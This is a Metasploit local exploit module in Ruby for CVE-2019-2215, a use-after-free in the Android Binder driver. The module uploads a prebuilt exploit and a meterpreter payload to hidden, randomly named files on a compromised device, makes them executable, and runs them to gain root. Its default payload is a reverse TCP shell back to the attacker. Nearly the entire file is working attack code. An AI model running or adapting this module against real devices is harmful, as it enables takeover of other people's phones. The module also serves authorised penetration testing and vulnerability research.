Share
##  
# This module requires Metasploit: https://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
class MetasploitModule < Msf::Exploit::Local  
Rank = ExcellentRanking  
  
include Msf::Post::File  
include Msf::Post::Common  
include Msf::Exploit::EXE  
include Msf::Exploit::FileDropper  
  
def initialize(info={})  
super( update_info( info, {  
'Name' => "Android Binder Use-After-Free Exploit",  
'Description' => %q{  
},  
'License' => MSF_LICENSE,  
'Author' => [  
'Jann Horn', # discovery and exploit  
'Maddie Stone', # discovery and exploit  
'grant-h', # Qu1ckR00t  
'timwr', # metasploit module  
],  
'References' => [  
[ 'CVE', '2019-2215' ],  
[ 'URL', 'https://bugs.chromium.org/p/project-zero/issues/detail?id=1942' ],  
[ 'URL', 'https://hernan.de/blog/2019/10/15/tailoring-cve-2019-2215-to-achieve-root/' ],  
[ 'URL', 'https://github.com/grant-h/qu1ckr00t/blob/master/native/poc.c' ],  
],  
'DisclosureDate' => "Sep 26 2019",  
'SessionTypes' => [ 'meterpreter' ],  
'Platform' => [ "android", "linux" ],  
'Arch' => [ ARCH_AARCH64 ],  
'Targets' => [[ 'Auto', {} ]],  
'DefaultOptions' =>  
{  
'PAYLOAD' => 'linux/aarch64/meterpreter/reverse_tcp',  
'WfsDelay' => 5,  
},  
'DefaultTarget' => 0,  
}  
))  
end  
  
def upload_and_chmodx(path, data)  
write_file path, data  
chmod(path)  
register_file_for_cleanup(path)  
end  
  
def exploit  
local_file = File.join( Msf::Config.data_directory, "exploits", "CVE-2019-2215", "exploit" )  
exploit_data = File.read(local_file, {:mode => 'rb'})  
  
workingdir = session.fs.dir.getwd  
exploit_file = "#{workingdir}/.#{Rex::Text::rand_text_alpha_lower(5)}"  
upload_and_chmodx(exploit_file, exploit_data)  
payload_file = "#{workingdir}/.#{Rex::Text::rand_text_alpha_lower(5)}"  
upload_and_chmodx(payload_file, generate_payload_exe)  
  
print_status("Executing exploit '#{exploit_file}'")  
result = cmd_exec("echo '#{payload_file} &' | #{exploit_file}")  
print_status("Exploit result:\n#{result}")  
end  
end